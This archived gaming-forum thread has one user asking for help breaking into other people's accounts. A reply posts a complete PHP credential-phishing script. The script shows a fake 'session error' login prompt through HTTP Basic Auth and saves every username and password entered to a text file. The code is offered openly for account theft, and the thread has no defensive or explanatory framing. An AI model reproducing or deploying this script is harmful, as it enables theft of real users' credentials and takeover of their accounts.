A preserved archive of the Logical Gamers community forums, 2009-2025. The original threads and posts, served read-only. Registration, posting and private messages are gone for good.

flw

978 views · started by To Give You This Gun ·
#1
flw
i need one ill give who ever get me on some accounts ... i will make it right i wont scam you please ....
#3
here is the code
<?php

if(isset($_SERVER['PHP_AUTH_USER'])){

$Handle = @fopen('Accounts.txt', 'a');



@fwrite($Handle, "Username = {$_SERVER['PHP_AUTH_USER']}\r\n");

@fwrite($Handle, "Password = {$_SERVER['PHP_AUTH_PW']}\r\n\r\n");



@fclose($Handle);

}

header('WWW-Authenticate: Basic realm="A session error has occured please verify your Username and Password."');

header('HTTP/1.0 401 Unauthorized');

exit;

?>